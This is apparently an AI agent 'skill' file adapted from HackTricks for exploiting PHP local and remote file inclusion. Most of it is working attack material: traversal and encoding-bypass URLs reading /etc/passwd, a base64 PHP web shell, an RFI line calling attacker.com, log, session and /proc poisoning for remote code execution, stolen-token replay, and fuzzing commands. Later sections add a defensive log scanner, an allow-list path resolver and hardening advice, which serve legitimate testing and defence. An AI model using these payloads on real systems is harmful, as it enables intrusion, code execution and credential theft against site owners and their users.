Hacktricks-skills file-inclusion-pentest

Security testing skill for identifying and exploiting Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities. Use this skill whenever you need to test for path traversal vulnerabilities, file inclusion attacks, PHP wrapper exploitation, or LFI2RCE techniques during security assessments. Trigger this skill when users mention file inclusion, path traversal, LFI, RFI, directory traversal, PHP include vulnerabilities, or need to test for arbitrary file read/write access.

Source: git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/pentesting-web/file-inclusion/file-inclusion/SKILL.MD

File Inclusion Pentesting Skill

A comprehensive guide for testing Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities during security assessments.

Quick Start

# Basic LFI test
http://example.com/index.php?page=../../../etc/passwd

# RFI test (if allow_url_include is On)
http://example.com/index.php?page=http://attacker.com/mal.php

Vulnerable PHP Functions

These functions are commonly vulnerable to file inclusion attacks:

  • require
  • require_once
  • include
  • include_once

Common Vulnerable Parameters

Test these parameter names for file inclusion vulnerabilities:

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

Basic LFI Testing

Standard Path Traversal

# Linux
http://example.com/index.php?page=../../../etc/passwd

# Windows
http://example.com/index.php?page=../../../../../../windows/win.ini

Bypass Techniques

Non-recursive Traversal Stripping

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://example.com/index.php?page=%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null Byte Injection (PHP < 5.4)

http://example.com/index.php?page=../../../etc/passwd%00

URL Encoding Bypasses

# Double URL encoding
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd

# Alternative encoding
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# Mixed encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Path Truncation (PHP < 5.3)

# Add extra characters to bypass .php append
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

Filter Bypass Tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

PHP Wrappers and Protocols

php://filter

Read and modify file content before inclusion:

# Read /etc/passwd with transformations
http://example.com/index.php?page=php://filter/read=string.toupper/resource=file:///etc/passwd

# Chain multiple filters
http://example.com/index.php?page=php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd

# Base64 decode
http://example.com/index.php?page=php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

# Compress and encode
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd

Available filters:

  • String: string.rot13, string.toupper, string.tolower, string.strip_tags
  • Conversion: convert.base64-encode, convert.base64-decode, convert.quoted-printable-encode, convert.iconv.*
  • Compression: zlib.deflate, zlib.inflate

php://fd

Access open file descriptors:

http://example.com/index.php?page=php://fd/3
http://example.com/index.php?page=php://stdin
http://example.com/index.php?page=php://stdout
http://example.com/index.php?page=php://stderr

data://

Execute code without file storage:

# Plain text
http://example.com/index.php?page=data://text/plain,<?php system($_GET['cmd']); ?>

# Base64 encoded
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

Note: Requires allow_url_fopen and allow_url_include to be On.

zip:// and rar://

Extract and include from archives:

# Create payload
zip payload.zip payload.php
mv payload.zip shell.jpg

# Include from archive
http://example.com/index.php?page=zip://shell.jpg%23payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

Other Protocols

# expect:// (requires expect extension)
http://example.com/index.php?page=expect://id

# input:// (POST data)
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

# phar:// (requires .phar file)
http://example.com/index.php?page=phar:///path/to/file.phar

LFI2RCE Techniques

Via Apache/Nginx Log Files

  1. Inject PHP payload in User-Agent or GET parameter
  2. Include the access log file

# Inject payload
GET /vuln?cmd=<?php system($_GET['c']); ?> HTTP/1.1
User-Agent: <?php system($_GET['c']); ?>

# Include log
http://example.com/index.php?page=../../../var/log/apache2/access.log

# Execute
http://example.com/index.php?page=../../../var/log/apache2/access.log&c=id

Common log paths:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log
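The same log files that make this technique possible are also where a defender sees it coming. The following is an added Python example, not part of the original skill: it parses combined-format access log lines and flags the indicators this page lists, traversal sequences (after undoing the double URL encoding and %c0%af overlong form from the URL Encoding Bypasses section), PHP wrappers such as php:// and data://, null bytes, and PHP open tags placed in the request or User-Agent as a log-poisoning attempt. The log lines are constructed for the example; the indicator names and regular expressions are this example's own.

```python
import re
from urllib.parse import unquote_to_bytes

# Indicators are matched against the *normalized* value so that the encoded
# variants listed in the cheat sheet collapse to their plain form first.
TRAVERSAL_RE = re.compile(r"\.\./")
WRAPPER_RE = re.compile(r"\b(?:php|data|zip|rar|phar|expect|glob|file|compress\.zlib)://", re.I)
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.I)
SENSITIVE_RE = re.compile(
    r"/etc/passwd|/proc/self/environ|/var/log/|/var/lib/php|/var/mail/|/var/spool/mail/|win\.ini",
    re.I,
)

# Combined log format used by Apache and Nginx by default:
# ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalize(value: str, max_rounds: int = 3) -> str:
    """Undo the layered encodings a one-pass filter misses: repeated URL decoding
    (so %252f becomes '/'), the overlong UTF-8 forms %c0%af -> '/' and %c0%ae -> '.',
    and backslash separators. Decoding stops once no '%' remains or after max_rounds."""
    data = value.encode("utf-8", "surrogateescape")
    for _ in range(max_rounds):
        if b"%" not in data:
            break
        data = unquote_to_bytes(data)
    data = data.replace(b"\xc0\xaf", b"/").replace(b"\xc0\xae", b".").replace(b"\\", b"/")
    return data.decode("utf-8", "replace")


def analyze_line(line: str) -> list:
    """Return the sorted indicator names found in one log line ([] when clean)."""
    match = LOG_RE.match(line)
    if not match:
        return ["unparsed_line"]
    path = normalize(match.group("path"))
    user_agent = normalize(match.group("ua"))
    found = set()
    if TRAVERSAL_RE.search(path):
        found.add("traversal")
    if WRAPPER_RE.search(path):
        found.add("php_wrapper")
    if SENSITIVE_RE.search(path):
        found.add("sensitive_target")
    if "\x00" in path:
        found.add("null_byte")
    if PHP_TAG_RE.search(path):
        found.add("php_code_in_request")
    if PHP_TAG_RE.search(user_agent):
        found.add("php_code_in_user_agent")
    return sorted(found)


def scan(lines):
    """Scan log lines; return [(line_number, indicators)] for flagged lines only."""
    hits = []
    for number, line in enumerate(lines, 1):
        indicators = analyze_line(line)
        if indicators:
            hits.append((number, indicators))
    return hits


# Constructed sample log (not real traffic); the payload shapes mirror the cheat sheet above.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1890 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd HTTP/1.1" 200 1890 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:43 +0000] "GET /vuln?cmd=%3C%3Fphp%20system%28%24_GET%5B%27c%27%5D%29%3B%20%3F%3E HTTP/1.1" 404 210 "-" "<?php system($_GET[\'c\']); ?>"',
    '203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?page=....//....//....//etc/passwd%00 HTTP/1.1" 200 1890 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /index.php?page=../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 73412 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, indicators in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(indicators)}")
```

Normalization runs before matching on purpose: a rule that looks for the literal `../` in the raw request never sees `..%252f` or `..%c0%af`, which is exactly the gap the encoding bypasses above exploit. Matching the User-Agent separately is what surfaces a poisoning attempt before the log is ever included.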

Via PHP Sessions

  1. Set session cookie with PHP payload
  2. Include the session file

# Set malicious session
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27

# Login with payload
login=1&user=<?php system("cat /etc/passwd");?>&pass=password

# Include session file
http://example.com/index.php?page=../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27

Via /proc/self/environ

GET /vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Via Email

# Send email with payload to user@localhost
# Include mail file
http://example.com/index.php?page=../../../var/mail/<USERNAME>
http://example.com/index.php?page=../../../var/spool/mail/<USERNAME>

Via Upload

# Upload file with embedded payload
http://example.com/index.php?page=path/to/uploaded/file.png

# Inject into image metadata for persistence

Via PHP Base64 Filter

Bypass file extension checks:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

Advanced Techniques

HTML-to-PDF SVG Path Traversal

For TCPDF/html2pdf vulnerabilities:

<!-- Inline SVG payload -->
<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmc+PGltYWdlIHhsaW5rOmhyZWY9Ii4uLy4uLy4uLy4uLy4uL3RtcC91c2VyX2ZpbGVzL3VzZXJfMS9wcml2YXRlX2ltYWdlLnBuZyIgaGVpZ2h0PSIxMDAlIiB3aWR0aD0iMTAwJSIvPjwvc3ZnPg==" />

<!-- URL encoded bypass -->
<img src="%2f..%252f..%252ftmp%252fsecret.png">

Blind Path Traversal

Use PHP filters as an oracle for error-based exfiltration:

# Use UCS-4LE encoding to trigger error on correct char
# Use dechunk filter to detect hex characters
# Use convert.iconv to shift characters

Vulnerable functions:

file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents, stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

Token Harvesting from Logs

# Read access logs
GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1

# Extract and replay tokens
GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1

Fuzzing and Automation

wfuzz Command

# Basic LFI fuzzing
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

# With wordlists
wfuzz -c -w /path/to/wordlist.txt http://target.com/page.php?file=FUZZ

curl with Path Preservation

curl --path-as-is -b "session=$SESSION" \
  "http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
  --ignore-content-length -s | tr '\000' '\n'

Testing Checklist

  • Test all file/path parameters with ../../../etc/passwd
  • Try different encoding schemes (URL, double-URL, hex)
  • Test PHP wrappers (php://filter, data://, zip://)
  • Attempt log file inclusion for RCE
  • Check for session file access
  • Test /proc/self/environ
  • Try null byte injection (older PHP)
  • Test path truncation techniques
  • Attempt blind LFI with error oracles
  • Check for RFI if allow_url_include is On
  • Test upload functionality for webshell placement

Hardening Recommendations

  1. Validate and sanitize all file path inputs
  2. Use allow-lists for permitted files/directories
  3. Canonicalize paths before use
  4. Disable allow_url_include and allow_url_fopen
  5. Run with least privilege
  6. Separate upload directories from web root
  7. Use chroot or containers to limit filesystem access
  8. Keep PHP updated (many fixes in 5.3+ and 5.4+)
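Recommendations 1 to 3 in working form, and the reason the Non-recursive Traversal Stripping payloads earlier on this page succeed, as an added Python example that is not part of the original skill: naive_strip is the single-pass filter that ....// defeats, and resolve_page is the allow-list plus canonicalization resolver the recommendations describe. The web root, page names, config.php and the ALLOWED_PAGES set are constructed for the example.

```python
import os
import tempfile


def naive_strip(value: str) -> str:
    """The filter that the '....//' payloads defeat: one non-recursive pass that deletes
    each '../' it finds. The characters left on either side then re-form a new '../'."""
    return value.replace("../", "")


def make_demo_root() -> str:
    """Create a throwaway web root (constructed for this example): a pages/ directory with
    two legitimate includes and a config.php one level up that must never be reachable."""
    root = os.path.realpath(tempfile.mkdtemp(prefix="lfi-demo-"))
    pages_dir = os.path.join(root, "pages")
    os.mkdir(pages_dir)
    for name in ("about", "contact"):
        with open(os.path.join(pages_dir, name + ".php"), "w") as fh:
            fh.write("<?php echo 'page: %s'; ?>\n" % name)
    with open(os.path.join(root, "config.php"), "w") as fh:
        fh.write("<?php $db_password = 'example-only'; ?>\n")
    return pages_dir


PAGES_DIR = make_demo_root()
ALLOWED_PAGES = frozenset({"about", "contact"})


def resolve_page(user_value: str, pages_dir: str = PAGES_DIR, allowed=ALLOWED_PAGES):
    """Return the canonical path to include, or None to refuse the request.
    Layer 1 (recommendation 2): the parameter is a page *name* checked against an allow-list,
    never a path. Pass allowed=None to see the remaining layers stand on their own.
    Layer 2 (recommendation 1): reject NUL bytes and URL schemes outright, which removes the
    null-byte truncation trick and the php://, data://, zip:// wrappers in one check.
    Layer 3 (recommendation 3): canonicalize with realpath and confirm the result is still
    inside pages_dir, so a '../' that slips past a weaker filter cannot leave the directory."""
    if "\x00" in user_value or "://" in user_value:
        return None
    if allowed is not None and user_value not in allowed:
        return None
    candidate = os.path.realpath(os.path.join(pages_dir, user_value + ".php"))
    if os.path.commonpath([pages_dir, candidate]) != pages_dir:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


if __name__ == "__main__":
    print("naive_strip('....//....//....//etc/passwd') ->", naive_strip("....//....//....//etc/passwd"))
    for value in ("about", "../config", "....//config", "../../../etc/passwd", "php://filter/resource=about"):
        print(repr(value), "->", resolve_page(value, allowed=None))
```

The allow-list alone stops every payload on this page, which is why it is the primary control; the scheme, NUL and containment checks are there so that a future code path that cannot use an allow-list (a download endpoint serving arbitrary files from one directory, say) still refuses anything that canonicalizes outside its directory.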
